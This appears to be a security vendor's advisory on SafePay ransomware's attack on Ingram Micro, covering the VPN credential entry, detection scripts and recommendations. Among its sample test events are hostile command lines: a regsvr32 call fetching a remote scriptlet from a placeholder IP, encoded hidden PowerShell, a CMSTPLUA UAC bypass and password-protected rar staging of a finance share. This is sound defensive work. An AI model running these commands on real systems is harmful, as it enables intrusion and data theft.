SafePay Ransomware Cripples Ingram Micro


On July 3, 2025, IT distribution giant Ingram Micro suffered a ransomware attack carried out by the SafePay operation. The incident caused a significant outage of Ingram Micro’s internal systems, affecting global operations including ordering platforms and distribution services. The attackers left ransom notes on affected systems; whether data was actually encrypted or exfiltrated has not been confirmed.

Severity Level: High

Incident Overview

  • Ingram Micro confirmed the attack on July 6, stating that it had detected ransomware on “certain internal systems”, isolated the affected environments, and launched an investigation with outside cybersecurity experts.
  • Systems affected: ordering systems, the AI-powered Xvantage distribution platform, and the Impulse licensing platform.
  • Data theft: the ransom notes claim broad data theft, but that wording is likely generic boilerplate; Ingram Micro has not confirmed that any specific dataset was exfiltrated.

How The Breach Happened

  • Entry vector: believed to be the company’s Palo Alto Networks GlobalProtect VPN.
  • Attack method:
    • VPN logon with compromised credentials (possibly obtained from prior breaches or password-spray attacks)
    • RDP logons to internal hosts after initial access
    • Possible abuse of VPN misconfigurations
    • Payload execution via regsvr32.exe and PowerShell, together with token impersonation

Root Cause

  • VPN access obtained with stolen or weak credentials.
  • Insecure VPN exposure: no multi-factor authentication (MFA) enforced on VPN logons, and possible misconfiguration of the GlobalProtect portal.
  • Detection gaps: the first visible signal was ransom notes on employee endpoints, meaning initial access, lateral movement, and payload delivery all went unnoticed.
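The credential side of this chain is detectable before any ransomware runs, because a spray and a brute force look different from normal authentication traffic. The script below is an added example, not tooling from Ingram Micro, Palo Alto Networks, or any of the sources cited on this page. It assumes a simplified `timestamp src=… user=… result=…` authentication log (real GlobalProtect logs carry more fields) and runs over constructed sample lines using documentation IP ranges. It distinguishes a password spray (one source, many distinct accounts, few failures each) from a brute force (one source, one account, many failures) and then flags any successful logon from a source that was just doing either, which is the "compromised credential" signal a SOC should act on.

```python
"""Credential-abuse detection over VPN authentication logs (added example).

A password spray tries a few passwords against many accounts from one source, so
per-account lockout never trips; a brute force hammers one account. A successful
logon from a source that was just doing either is the signal worth paging on.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. The key=value layout and the addresses (documentation
# ranges) are assumptions for this example, not real GlobalProtect output.
SAMPLE_AUTH_LOG = """\
2025-07-01T02:00:01Z src=203.0.113.7 user=alice result=FAIL
2025-07-01T02:00:03Z src=203.0.113.7 user=bob result=FAIL
2025-07-01T02:00:05Z src=203.0.113.7 user=carol result=FAIL
2025-07-01T02:00:07Z src=203.0.113.7 user=dave result=FAIL
2025-07-01T02:00:09Z src=203.0.113.7 user=erin result=FAIL
2025-07-01T02:00:12Z src=203.0.113.7 user=frank result=SUCCESS
2025-07-01T02:05:00Z src=198.51.100.9 user=alice result=FAIL
2025-07-01T02:05:02Z src=198.51.100.9 user=alice result=FAIL
2025-07-01T02:05:04Z src=198.51.100.9 user=alice result=FAIL
2025-07-01T02:05:30Z src=198.51.100.9 user=alice result=SUCCESS
2025-07-01T03:30:00Z src=192.0.2.44 user=grace result=SUCCESS
"""

WINDOW = timedelta(minutes=10)


def parse_log(text):
    """Parse 'ISO8601 key=value ...' lines into dicts with a datetime 'ts'."""
    records = []
    for line in text.splitlines():
        if line.strip():
            ts, *fields = line.split()
            rec = dict(f.split("=", 1) for f in fields)
            rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
            records.append(rec)
    return records


def _failures_by_src(records):
    """Failed logons grouped by source address, each group sorted by time."""
    groups = defaultdict(list)
    for r in records:
        if r["result"] == "FAIL":
            groups[r["src"]].append(r)
    for g in groups.values():
        g.sort(key=lambda r: r["ts"])
    return groups


def detect_spray(records, window=WINDOW, min_users=5):
    """{src: sorted usernames} for sources whose failures cover >= min_users
    distinct accounts inside some window-long slice (sliding window)."""
    sprayers = {}
    for src, fails in _failures_by_src(records).items():
        start = 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            users = {r["user"] for r in fails[start:end + 1]}
            if len(users) >= min_users:
                sprayers[src] = sorted(users)
                break
    return sprayers


def detect_brute_force(records, window=WINDOW, min_fails=3):
    """{(src, user)} pairs with >= min_fails failures inside a window."""
    hits = set()
    for src, fails in _failures_by_src(records).items():
        per_user = defaultdict(list)
        for r in fails:                      # already time-ordered
            per_user[r["user"]].append(r["ts"])
        for user, stamps in per_user.items():
            for i in range(len(stamps) - min_fails + 1):
                if stamps[i + min_fails - 1] - stamps[i] <= window:
                    hits.add((src, user))
                    break
    return hits


def suspicious_logins(records, window=WINDOW):
    """Successful logons from a spraying or brute-forcing source that also
    failed a logon within the window before the success."""
    bad = set(detect_spray(records, window)) | {s for s, _ in detect_brute_force(records, window)}
    fails = _failures_by_src(records)
    return [(r["src"], r["user"]) for r in records
            if r["result"] == "SUCCESS" and r["src"] in bad
            and any(timedelta(0) <= r["ts"] - f["ts"] <= window for f in fails[r["src"]])]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_AUTH_LOG)
    print("spray sources:", detect_spray(recs))
    print("brute force:", detect_brute_force(recs))
    print("logons to investigate:", suspicious_logins(recs))
```

On the sample, 203.0.113.7 is flagged as a sprayer (five accounts in ten seconds) and its later success as frank is reported; 198.51.100.9 never trips the spray rule because it only targets alice, but the brute-force rule catches it and its eventual success is reported too; grace's logon from 192.0.2.44 is left alone. The same counters are what a rate-limiting control on the VPN would key on (failures per source, not just per account), which is why per-account lockout alone does not stop a spray.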

Lessons Learned

  • Single-factor VPN access remains a critical weak point – threat actors keep using it as a low-friction entry vector with stolen or brute-forced credentials.
  • Privileged accounts are immediate force multipliers for attackers: once compromised, they enable rapid lateral movement and ransomware deployment without raising alarms.
  • Threat actors are minimising their persistence footprint, relying on legitimate credentials and built-in tools to avoid detection and slip past traditional security monitoring.
  • Lack of early detection delayed containment: initial access and lateral movement were complete before the ransomware trigger, leaving defenders reactive rather than proactive.

Ransomware Profile – SafePay

  • Active Since: November 2024
  • Known Victims: Over 220 across various sectors
  • Target regions: Germany, United States, United Kingdom, Canada, Peru, Australia, Colombia, Romania, Singapore, Spain, and others.
  • Target sectors: Manufacturing, Business Services, Education, Healthcare, Technology
  • Status: One of the most active ransomware groups in 2025.
  • Notable behavior: Often leaves ransom notes claiming data theft, though not always substantiated.

Recommendations

  1. Mandate multi-factor authentication (MFA) for all VPN, RDP, and privileged accounts.
  2. Restrict RDP exposure through firewall rules or network segmentation, and monitor for unexpected RDP activity, including logons that originate from the VPN address pool.
  3. Enforce strong password policies and rate-limit authentication attempts on the VPN to blunt brute-force and password-spray attacks.
  4. Harden VPN infrastructure (e.g., Palo Alto GlobalProtect) by patching promptly and reviewing configurations for unnecessarily exposed services and portals.
  5. Disable or restrict LOLBins (e.g., regsvr32.exe, systemsettingsadminflows.exe) where they are not needed, and alert on their execution elsewhere.
  6. Enforce Windows Defender and AV settings (including tamper protection) via GPO so they cannot be disabled from the GUI.
  7. Detect UAC bypass attempts by monitoring for DLLHost.exe being launched as the surrogate for the CMSTPLUA COM object (commonly abused by ransomware).
  8. Restrict SeDebugPrivilege to accounts that genuinely need it; monitor token-manipulation API calls such as ZwOpenProcessToken.
  9. Monitor for suspicious WinRAR usage (archive creation on file servers or user shares) followed by outbound data transfers, the typical staging-then-exfiltration pattern.
  10. Block the IOCs in the VirusTotal collection below at the corresponding controls (firewall, proxy, mail gateway, EDR):
    https://www.virustotal.com/gui/collection/e9a56c9ef0ea3a757fc2b02194c92a306f103fae59d897640d3bbc74cc54c720/iocs
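Recommendations 5, 7 and 9 above, and the regsvr32/PowerShell execution described under “How The Breach Happened”, all reduce to rules over process-creation telemetry. The script below is an added example written for this page; it is not code from Ingram Micro, Huntress, NCC Group, or any other cited source. It assumes Sysmon Event ID 1 style field names (`Image`, `CommandLine`, `ParentImage`) and runs over constructed sample events with assumed paths and hosts. The CLSID it matches is the published class ID of the CMSTPLUA COM server, which is what dllhost.exe hosts during that UAC bypass. Recommendation 8 (SeDebugPrivilege and ZwOpenProcessToken) is an API-level signal that process-creation events do not carry, so it is not covered here.

```python
"""Process-creation rules for the SafePay host-side TTPs (added example).

Events carry Sysmon Event ID 1 style fields. Each rule returns a label or
None; scan() collects the labels tripped by every event.
"""
import re
from ntpath import basename

# Published CLSID of the CMSTPLUA COM server; dllhost.exe started with it is
# the elevated-COM UAC bypass referred to in recommendation 7.
CMSTPLUA_CLSID = "{3e5fc7f9-9a51-4367-9063-a120244fbec7}"
# Directories a standard user can write to: a DLL loaded from here by a LOLBin is suspect.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Temp)\\", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def _img(ev, field="Image"):
    """Lower-cased file name of a Windows path field, '' if absent."""
    return basename(ev.get(field, "")).lower()


def rule_regsvr32(ev):
    """regsvr32 pulling a remote scriptlet or loading a DLL from a user-writable path."""
    if _img(ev) != "regsvr32.exe":
        return None
    cl = ev.get("CommandLine", "")
    if re.search(r"/i:\s*https?://", cl, re.I) or "scrobj.dll" in cl.lower():
        return "regsvr32_remote_scriptlet"
    if USER_WRITABLE.search(cl):
        return "regsvr32_user_writable_dll"
    return None


def rule_cmstplua(ev):
    """dllhost.exe hosting the CMSTPLUA object: UAC bypass attempt."""
    if _img(ev) == "dllhost.exe" and CMSTPLUA_CLSID in ev.get("CommandLine", "").lower():
        return "uac_bypass_cmstplua"
    return None


def rule_admin_flows(ev):
    """systemsettingsadminflows.exe launched from a shell instead of the Settings app."""
    if _img(ev) == "systemsettingsadminflows.exe" and _img(ev, "ParentImage") in SHELLS:
        return "adminflows_from_shell"
    return None


def rule_encoded_powershell(ev):
    """PowerShell with an encoded command: the usual loader stage."""
    if _img(ev) in ("powershell.exe", "pwsh.exe") and re.search(
            r"\s-(e|ec|enc|encodedcommand)\s", ev.get("CommandLine", ""), re.I):
        return "powershell_encoded_command"
    return None


def rule_winrar_staging(ev):
    """rar/WinRAR adding files to a password-protected archive (-hp): staging for exfiltration."""
    if _img(ev) in ("rar.exe", "winrar.exe"):
        cl = ev.get("CommandLine", "")
        if re.search(r"\s[am]\s", cl) and re.search(r"\s-hp", cl, re.I):
            return "winrar_password_archive"
    return None


RULES = (rule_regsvr32, rule_cmstplua, rule_admin_flows, rule_encoded_powershell, rule_winrar_staging)


def scan(events):
    """[(index, [labels])] for every event that trips at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        labels = [lab for rule in RULES if (lab := rule(ev))]
        if labels:
            hits.append((i, labels))
    return hits


# Constructed sample events; paths, hosts and the IP are assumptions for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://203.0.113.7/u.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\dllhost.exe",
     "CommandLine": r"C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\WinRAR\Rar.exe",
     "CommandLine": r'"C:\Program Files\WinRAR\Rar.exe" a -r -hpSecret123 C:\Users\Public\fin.rar \\fs01\finance',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\SystemSettingsAdminFlows.exe",
     "CommandLine": r"SystemSettingsAdminFlows.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\jdoe\AppData\Local\Temp\upd.dll",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",            # benign vendor installer
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign scheduled task
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS):
        print(idx, labels)
```

The first six sample events each trip exactly one rule; the two benign events (a vendor installer registering its own DLL from Program Files, and a scheduled PowerShell script without encoding) are ignored. Tuning is mostly about the user-writable path list and the parent-process set: the regsvr32 rule keys on where the DLL lives rather than on regsvr32 itself, since blocking the binary outright (recommendation 5) breaks legitimate installers.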

Sources:

  • https://www.bleepingcomputer.com/news/security/ingram-micro-outage-caused-by-safepay-ransomware-attack/
  • https://www.businesswire.com/news/home/20250705035732/en/Ingram-Micro-Issues-Statement-Regarding-Cybersecurity-Incident
  • https://medium.com/@DCSO_CyTec/safepay-the-new-kid-on-the-block-4141188a626d
  • https://www.huntress.com/blog/its-not-safe-to-pay-safepay
  • https://github.com/crocodyli/ThreatActors-TTPs/blob/main/SafePay/Safepay-TTP.md
  • https://www.nccgroup.com/us/research-blog/weak-passwords-led-to-safepay-ransomware-yet-again/


Ampcus Cyber